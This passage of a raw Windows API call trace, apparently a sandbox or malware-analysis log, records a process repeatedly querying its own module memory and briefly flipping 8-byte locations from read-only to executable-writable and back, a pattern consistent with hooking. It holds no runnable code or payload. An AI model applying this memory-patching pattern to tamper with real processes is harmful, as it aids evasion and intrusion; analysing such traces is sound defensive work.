dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977ab0000, AllocationBase=0x7ff977ab0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.902] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.902] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9753d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9753d0000, AllocationBase=0x7ff9753d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.902] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.902] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973090000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973090000, AllocationBase=0x7ff973090000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.902] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.902] VirtualProtect (in: lpAddress=0x7ff9730ce1e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.903] VirtualProtect (in: lpAddress=0x7ff9730ce1e0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.903] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9773c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9773c0000, AllocationBase=0x7ff9773c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.903] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.903] VirtualProtect (in: lpAddress=0x7ff977435428, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.903] VirtualProtect (in: lpAddress=0x7ff977435428, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.903] VirtualProtect (in: lpAddress=0x7ff977435420, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.904] VirtualProtect (in: lpAddress=0x7ff977435420, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.904] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977760000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977760000, AllocationBase=0x7ff977760000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.904] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.905] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977830000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977830000, AllocationBase=0x7ff977830000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.905] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.905] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977df0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977df0000, AllocationBase=0x7ff977df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.905] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.905] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9749b0000, AllocationBase=0x7ff9749b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.905] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.906] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9757b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9757b0000, AllocationBase=0x7ff9757b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.906] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.906] VirtualProtect (in: lpAddress=0x7ff975839728, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.906] VirtualProtect (in: lpAddress=0x7ff975839728, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.907] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9774c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9774c0000, AllocationBase=0x7ff9774c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.907] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.907] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975310000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff975310000, AllocationBase=0x7ff975310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.907] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.907] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977360000, AllocationBase=0x7ff977360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.907] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.908] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975900000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff975900000, AllocationBase=0x7ff975900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.908] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.908] VirtualProtect (in: lpAddress=0x7ff975ee63b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.909] VirtualProtect (in: lpAddress=0x7ff975ee63b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.909] VirtualProtect (in: lpAddress=0x7ff975ee63e8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.910] VirtualProtect (in: lpAddress=0x7ff975ee63e8, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.910] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974c30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974c30000, AllocationBase=0x7ff974c30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.910] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.910] VirtualProtect (in: lpAddress=0x7ff9750d2758, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.911] VirtualProtect (in: lpAddress=0x7ff9750d2758, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.917] VirtualProtect (in: lpAddress=0x7ff9750d26b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.918] VirtualProtect (in: lpAddress=0x7ff9750d26b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.918] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9776c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9776c0000, AllocationBase=0x7ff9776c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.918] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.918] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9749a0000, AllocationBase=0x7ff9749a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.918] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.919] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974980000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974980000, AllocationBase=0x7ff974980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.919] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.919] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974a00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974a00000, AllocationBase=0x7ff974a00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.919] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.920] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974960000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974960000, AllocationBase=0x7ff974960000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.920] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.920] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971180000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971180000, AllocationBase=0x7ff971180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.920] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.920] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9733b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9733b0000, AllocationBase=0x7ff9733b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.920] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.921] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972590000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972590000, AllocationBase=0x7ff972590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.921] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.921] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9686c0000, AllocationBase=0x7ff9686c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.921] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.921] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f90000, AllocationBase=0x7ff971f90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.921] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.922] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972bc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972bc0000, AllocationBase=0x7ff972bc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.922] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.922] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974520000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974520000, AllocationBase=0x7ff974520000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.922] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.922] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974000000, AllocationBase=0x7ff974000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.922] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.923] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973140000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973140000, AllocationBase=0x7ff973140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.923] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.923] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971b90000, AllocationBase=0x7ff971b90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.923] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.923] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973110000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973110000, AllocationBase=0x7ff973110000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.923] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.924] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977720000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977720000, AllocationBase=0x7ff977720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.924] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.924] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977200000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977200000, AllocationBase=0x7ff977200000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.924] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.924] VirtualProtect (in: lpAddress=0x7ff9772e1820, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.925] VirtualProtect (in: lpAddress=0x7ff9772e1820, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.925] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974720000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974720000, AllocationBase=0x7ff974720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.925] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.925] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977b60000, AllocationBase=0x7ff977b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.925] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.925] VirtualProtect (in: lpAddress=0x7ff977c23020, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.926] VirtualProtect (in: lpAddress=0x7ff977c23020, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.926] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977d40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977d40000, AllocationBase=0x7ff977d40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.926] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.927] VirtualProtect (in: lpAddress=0x7ff977daa2a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.927] VirtualProtect (in: lpAddress=0x7ff977daa2a0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.928] VirtualProtect (in: lpAddress=0x7ff977daa2b8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.929] VirtualProtect (in: lpAddress=0x7ff977daa2b8, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.929] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974830000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974830000, AllocationBase=0x7ff974830000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.929] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.929] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9741d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9741d0000, AllocationBase=0x7ff9741d0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.929] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.930] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9748a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9748a0000, AllocationBase=0x7ff9748a0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.930] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 